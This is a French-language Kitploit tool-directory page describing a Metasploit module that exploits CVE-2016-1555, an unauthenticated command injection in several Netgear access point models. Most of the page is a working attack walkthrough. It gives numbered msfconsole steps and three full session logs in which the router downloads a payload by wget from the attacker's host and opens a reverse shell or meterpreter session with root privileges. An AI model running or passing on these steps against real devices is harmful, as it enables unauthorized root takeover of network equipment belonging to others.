Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2016-1555 — Module Metasploit exploitant une injection de commande non authentifiée dans plusieurs modèles de routeurs Netgear pour obtenir une exécution de code à distance avec les privilèges root. | Kitploit
Outils/GitHubGitHub/ide0x90/cve-2016-1555
Sécurité des Systèmes EmbarquésFrameworks d'ExploitationSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubide0x90/cve-2016-1555

cve-2016-1555

Module Metasploit exploitant une injection de commande non authentifiée dans plusieurs modèles de routeurs Netgear pour obtenir une exécution de code à distance avec les privilèges root.

22il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Description

Le module exploite une vulnérabilité d'exécution de commande arbitraire non authentifiée dans Netgear WN604 avant 3.3.3 et WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, et WNDAP660 avant 3.5.5.0. La vulnérabilité réside dans la manière dont le routeur gère les requêtes POST provenant de (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, et (5) boardDataWW.php. La vulnérabilité a été découverte par Daming Dominic Chen, créateur de FIRMADYNE (https://github.com/firmadyne/firmadyne).

Application vulnérable

  1. Lancez msfconsole
  2. Faites : use exploit/linux/http/netgear_unauth_exec
  3. Faites : set RHOST [IP du routeur]
  4. Faites : set SRVHOST [IP de votre serveur] si votre charge utile n'est pas hébergée sur un autre système
  5. Faites : set LHOST [Votre IP]
  6. Faites : set MAC_ADDRESS [nombre à 12 chiffres] si vous voulez une adresse MAC spécifique au lieu d'une aléatoire
  7. Faites : set TARGETURI [URI cible] si vous voulez cibler une autre URI au lieu de la valeur par défaut boardDataWW.php
  8. Faites : set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp si vous voulez une session meterpreter
  9. Faites : exploit
  10. Si le routeur est vulnérable, la charge utile sera téléchargée via wget (le stager HTTP par défaut) et exécutée, et vous devriez obtenir une session

Exemple avec la charge utile par défaut (linux/mipsbe/shell_reverse_tcp)

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

Exemple avec meterpreter (linux/mipsbe/meterpreter/reverse_tcp)

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

Exemple utilisant une autre URI vulnérable (boardDataNA.php)

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)
Télécharger l’outil